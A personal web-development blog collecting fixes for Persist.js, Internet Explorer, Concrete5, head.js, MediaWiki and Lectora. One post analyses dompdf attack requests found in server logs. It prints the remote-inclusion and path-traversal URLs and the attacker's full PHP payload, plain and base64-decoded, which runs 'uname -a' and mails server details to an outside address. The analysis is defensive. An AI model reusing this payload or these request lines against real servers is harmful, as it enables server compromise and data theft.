Two Drifters

Yes, it seems to be by design (of Firefox' implementation of localstorage). It does not work for file:// URLs.

Persist.js currently has no workaround, the contents of your database will be cleared …

In order for Firefox to work offline, you have to remove the "localstorage" type manually, like this:

Persist.remove('localstorage');

Persist.js will issue a warning that globalStorage can't be used, and fall back to cookie storage, which has size limitations. On a side note, removing both localstorage and cookie storage will fall back to Flash. Flash will probably work, but it pops up a message which your users might find bewildering, and click away – viz:

What is left after removing localstorage, cookie and flash?

Nothing (as Gears is not available).

Cookie's the way to go – you will have to live with the size restraints!

The way to check for larger strings than the storage allows does not seem to work for me. I used:

Persist.size != -1 && Persist.size < JSON.stringify(tmp_answer_db).length

One work around for larger data might be to use a JS compressor to fit all into the cookie. Or save less – reduce to the essential! Don't use JSON, use your own notation. Even JSON is too large for the cookie.

Update: Detecting firefox in a local file:// environment and removing localstorage

//detect FireFox. If it's the Fox, AND running locally remove localstorage
if (/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent) && window.location.protocol == 'file:'){
Persist.remove('localstorage');
}

After installing Varnish I can see pages which are frequently accessed.

//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?

And

/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00

were lines which I found quite strange. Was someone abusing my server to convert their stuff to PDF?

I tried to go to fridela.com – it seems like a normal website, dedicated to selling food to housewives.

vero.txt is reported as dangerous by Microsoft Security Essentials.

I DO know that it's a text file, probably it's danger lies if used with the correct application. Here's the contents of vero.txt

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"";echo'" DESIGNTIMESP=16110>http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIuJHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJ1bml4b24yMDEwQGdtYWlsLmNvbSIsIlNldG9yYW4gQm9zICIuJHNhZmVtb2RlLCRib2R5LCRmbG9hdCk7"));
die("<center> ByroeNet </center>");
?>

The base64 part decodes to

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safem
ode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $f
loat = "From : vurl info <full@info.com>"; $aran = exec('uname -a;'); $web = $_S
ERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$
inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$saf
emode; mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

Actually the exploit has to be executed by DomPDF for it to work, i.e. meaning it should execute PHP code. After the exploit has been installed, a mail is sent to unixon2010@gmail.com

additional code seems to be hosted at http://www.fridela.com/slide/air.txt – it's apparently a control interface to the cracked server (maybe also injected via DomPDF).

Be careful around these. Turn off inclusion of remote URLs in your PHP.ini.

You want to use fixed positioning with CSS

If you want to make use of the simple CSS position:fixed; to display an element static to the viewport, you will run into problems with the Internet Explorer.

position:fixed is only supported since Internet Explorer 7

I tested this solution with IE 7.0.5730.13 on Windows XP. IE 6 does not support fixed positioning.

You need to enforce strict mode

Internet Explorer will default to "quirky rendering mode", if you don't add special tags to your HTML document:

<!DOCTYPE html>
<HTML>
<HEAD>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Progress Test</title>
<meta http-equiv= "X-UA-Compatible"content="IE=Edge">
<script language = "JavaScript" src="../head.min.js"></script>
[...]

Both are essential! If you try IE 9 on the page without having added the meta tag X-UA-Compatible, it will render the page in quirky mode. And in quirky mode, it will ignore your position:fixed, and render your element where you have put it in the flow of the document.

Please note: I have read that this meta tag actually is not valid for this DOCTYPE.

It still does not work? I am testing with local documents!

Internet Explorer also takes into account where the element is being served from. This solution will work, if you upload your test documents to a server and access them over the Internet. It will not work (see note below) for local files, even if you use a local webserver to serve up the files (i.e. XAMPP). Internet Explorer will render your document in quirky mode, in this case.

Note: actually it does work offline (opening a document from the harddrive) in Internet Explorer 9 after fiddling somewhat with the document. I removed a IE compatibility script (not shown above), which I had included from Google previously. Check if you have one of those, and remove it!

URL Shortening is all the rage now. Sometimes you want to give people ridiculously long URLs, which might also be subject to change.

So you want to do it with C5, don't you?

Great, you think – there's the "add external link" menu option in Concrete's sitemap. Unfortunately it does not work the way you expect it to – it just adds the link to the Navigation, but no page alias to point to the external page (i.e. http://www.synapse-redaktion.de/FaceBook won't work after adding a "FaceBook" external link).

What to do to solve this dilemma?

My suggestion is to use both: add a (hidden) page "FaceBook" which does header JavaScript forwarding to the other page, so you can give out the links to the people, and a "real external link" so you don't have to rely on JavaScript for most of your visitors.

The SiteMap will look like this:

Adding custom attributes: (Header Extra Content, Exclude from Page List, Exclude from Nav)

The page's setup:

The script is easy:

<script type="text/javascript">
<!–
window.location = "http://www.surfnext.com"
//–>
</script>

with surfnext.com being the URL you are forwarding to.

If you have the time, you might want to add a static link or icon to the page (/*comment*/ the window.location = … part to be able to edit the page!) in case some person has their JavaScript turned off.

What are .pages files?

They are files created with Pages, a part of the iWork productivity suite for Mac OS X.

How can I open them?

There is no known software which can open .pages natively on Windows or Linux.

But, there's a kind of a workaround which lets you access the content of the .pages files.

The workaround

The file is actually a .zip archive! If you have 7-zip right-click the file to extract it. If not, you may rename the file to filename.zip and extract it with your favorite ZIP application. (Windows can do it from Windows XP upwards).

The folder / files which you obtain from the .pages file contains different files and folders.

• index.xml – if you are truly desperate, the text is in here and can be extracted with a lot of patience, I guess. Also theoretically someone could write a parser for this file sometime.
• QuickLook – this folder contains preview versions of your .pages file. If it is present – sometimes it is not (if the creator of the file did not include a preview!)

What about QuickLook & the preview files?

There's two types (I know of):

• PDF files – you're lucky, it contains your .pages in a format suitable for reading and further processing
• JPG images – this is a low-resolution screenshot of the .pages file, you can still read it, but … well no copy'n'paste here.

What about Free Opener from freeopener.com?

The guys over at fileinfo.com claim that Free Opener can open .pages. Well, it's just doing the preview files thing from above. Meaning – if you only have a low-res JPEG preview image, that's all you get from Free Opener. No text, I'm sorry to say.

I like the installer – I think more installers should be built like theirs, BUT – it seems to install along with it many programs which you actually did not want in the first place, if you are not careful. Also there are rumours about it installing Adware (see WOT).

I would at this point advise against installing Free Opener to open .pages files. Use the manual method.

Are there other solutions to open .pages files?

• Google Docs is supposed to be able to open them
• Ask your friend / colleague / … to send you a PDF file, or to export to Word-readable formats (formatting may be lost with the latter option)
• Buy a Mac.

Can InDesign access .pages files?

Not on Windows to my knowledge. Tested with InDesign CS5 + Windows 7 64bit without any extensions, by trying to place a .pages file. "No filter could be found".

What is head.js

From the same author as the fabulous JQuery Tools library – head.js is "the only script in your head". You include it in your HTML output, and write code for it to include and run other JS files. It also offers some extensions for CSS, for instance you can optimize for different screen resolutions or fix glitches in different browsers.

Why should you include your files via head.js?

Well, the browser will load in a blocking manner – that is, it will load the resources it encounters first, and then continue loading the other resources. If you have a bunch of JS files, they might take a while to load (think of the HTTP request overhead, and of network latency!), thus blocking images, CSS files and other content on your site.

Head.js is only one (small) JS file to include, which will take care of loading your JS files asynchronously and simultaneously in the background. Once they are ready, you can execute code using the head.ready() method.

The result is – your webpage display significantly faster!

Problem

Sometimes, the scripts you load via head.js will work, sometimes they won't – i.e. features of the site additionally coded by you will not show up constantly and predictably.

Solution

The problem may be a race condition. Head.js loads the scripts asynchronously, so sometimes the other code on your site gets executed before the JS files included via head.js are executed, and sometimes afterwards.

Example: you are passing some information to your script via a variable which differs from page to page.

Your code is something like this (actually I moved the call to head.js() to the head.min.js file itself, which may contribute to the problem!):

<script language = "JavaScript" src="includes/head.min.js"></script>
<script type="text/javascript">
head.js('includes/jquery.tools.min.js','includes/custom-script.js');

… lots of code inbetween …

var variable_to_pass = 'some value';
</script>

and in your custom-script.js you rely on variable_to_pass like this:

var i_rely = variable_to_pass;

Sometimes your variable_to_pass will get set up before head.js has loaded your custom-script, and sometimes not. In the first case, all will go well, in the latter case, your code will fail. In Google Chrome, for instance, silently, unless you activate the JavaScript console to see the error stated.

This is called a race condition. The solution to this condition is to rely on external variables only once the whole page has loaded and is scriptable, which you have to test for, extra.

For instance you could use JQuery's $(function() {]); method for this, setting up the dependent variable or using the passed variable inside the function.

Another possibility is to check if the variable is as of yet undefined, and to give it a default value.

if (typeof(variable_to_pass) === 'undefined') {
variable_to_pass = 'some default value';

}

(not writing var before the variable will make it global).

For my worldwide Internet access project surfnext.com I developed an extension for MediaWiki to use amMap.

What is amMap?

amMap is a pretty cool Flash-based map which allows you to display geographical information. Check out the examples on amMap.com. It has been used on many pages world-wide, and now – thanks to SurfNext's needs – it is coming to MediaWiki!

What is MediaWiki?

It is the Wiki software which is behind Wikipedia and many other major wikis. SurfNext.com is also based on MediaWiki. Ah, the power of free software!

Why Flash, why amMap?

Because there is no free JavaScript-based map out there, which is not based on tiles. (Please post a link if you know any vector-based JavaScript map !!!)

Unfortunately iDevices (iPhone, etc) do not have Flash capabilities. Thus, you can't see the amMap on them.

Android has Flash support.

Download & Credits

Download version 0.5. (amMap v. 2.5.7 is included).

amMap requires you to leave the link to amMap (inside the map) intact, or to buy a commercial license.

I ask you to provide a back-link to my project SurfNext.com, if this extension is of value to you.

This extension is still in early beta, use at your own risk. Post comments about the extension on this blog page, thank you!

Installation

snAmmap requires MediaWiki 1.17 or higher, as it uses ResourceLoader. (Feel free to fork a version for earlier MediaWikis).

An alternative, of course, is to upgrade your Wiki. It is advisable, as the new release sports significant speed enhancements.

• Put the snAmmap folder in your extensions folder.
• Add require_once("$IP/extensions/snAmmap/snAmmap.php"); to your LocalSettings.php
• If you want to, you can create custom data and settings files and put them somewhere in your Wiki installation path. (i.e. a folder custom)

Usage

Currently snAmmap only supports one map per page. After you have installed the extension, use the following tag in your Wiki where you want to include the map:

<ammap height="500px" width="500px" bgcolor="#FFFFFF" data_file="/custom/data.xml" settings_file="/custom/settings.xml">Placeholder text</ammap>

None of the tag's attributes are required, there are sensible defaults for them (falling back on the data_file and settings_file provided with amMap, for instance.)

• height => sets the height of the map. Can be a percentage
• width => sets the width. Can also be a percentage.
• bgcolor => sets the initial background color, which can be modified in the settings file later.
• data_file => sets the path (URL!) for the data_file. Can be a full URL with hostname, but you have to enable cross-site scripting, which is dangerous. Use a file from your server, preferably.
• settings_file => sets the path for the settings_file

See the documentation of amMap for more details and information what you can modify.

Live Example

SurfNext.com uses the snAmmap extension on the main page in conjunction with custom data and settings files for a map which links to Wiki pages. It also has a dropdown menu from which you can select the individual countries by name, which also links to the Wiki pages.

SurfNext shows you how to obtain Internet access everywhere in the world. Feel free to join and participate!

Feel free to comment about SurfNext on this blog page.

If you include SemanticBundle.php, as suggested by the developers, your Wiki will break (in the version 2011-07-30.20110730 ) with a PHP error:

[03-Aug-2011 11:43:33] PHP Parse error: syntax error, unexpected '[', expecting ')' in /.../extensions/semantic-bundle/SemanticBundle.php on line 12

The fix is simple, replace

'author' => array( ''[http://www.mediawiki.org/wiki/User:Yaron_Koren Yaron Koren]'

by

'author' => array( '[http://www.mediawiki.org/wiki/User:Yaron_Koren Yaron Koren]'

(That is, one ' has to be removed, probably a typo).

Does anyone know how to report the bug back to the developers?

Today, I upgraded the MediaWiki installation for SurfNext to 1.17, and encountered some problems.

Problem: Bad Behaviour is missing a function after the upgrade

The new web upgrade process fails because of this with a blank page in step 2. After upgrading with the command line PHP script, the webpage will stay blank.

A look at the PHP logs yields the solution:

[17-Jul-2011 13:15:17] PHP Fatal error: Call to undefined function wfQuery() in /…/extensions/bad-behavior/bad-behavior-mediawiki.php on line 68

A website suggests to add the following code to the top of bad-behaviour-mediawiki.php:

require_once( "$IP/includes/DatabaseFunctions.php" );

It turns out, that in older MediaWiki installations wfQuery and some other functions have been defined for compatibility reasons, they used to reside in the includes folder, in DatabaseFunctions.php.

As of MediaWiki 1.17, they have been removed – and the include solution does not work anymore!

Solution:

Ped Xing on the Bad Behaviour forum suggests a solution, which works:

Edit bad-behaviour-mediawiki.php and replace the line where wfQuery is located with the following two lines:

$dbr =& wfGetDB( DB_SLAVE );
$bb2_last_query = $dbr->query($query) ;

Now the page loads again, without any other changes. If you tried the include solution outlined above, be sure to remove the include again, as it will throw errors by itself (the file can't be found as it is not present anymore).

Problem: If you publish a title with Lectora, and try to view it from Opera, instead of the title you see an error message

Your browser does not support dynamic html. Please download a current version of either Microsoft'" DESIGNTIMESP=18189>Microsoft Internet Explorer or Mozilla'" DESIGNTIMESP=18192>Mozilla Firefox and try visiting our site again. Thank You.

Solution: You have to modify trivantis.js in line 353 and line 355. The modifications are displayed in bold

this.ns = (name=="ns" && this.v>=4)||(navigator.userAgent.indexOf("Opera")!=-1)
this.ns4 = (this.ns && this.v==4)
this.ns5 = (this.ns && this.v==5)||(navigator.userAgent.indexOf("Opera")!=-1)

IMPORTANT: WordPress fucks up the quotation marks above, fix them by hand!!!

This tells Lectora's code to treat Opera like Netscape Navigator and its derivates. For the title we are developing for the WHO (ICF eLearning tool) it works flawlessly.

This fix is taken from this Lectora forum message, posted by ssneg.

(ssneg also explains why it is not possible to override this.min and set it to true – because Lectora only includes code for IE or NS to display the title contents, like buttons, later on. Thus we need for Opera to "pretend" that it is Navigator. The code works.)

Do you know any other browsers incompatible with Lectora? Please post a comment, and we might find a solution :-)!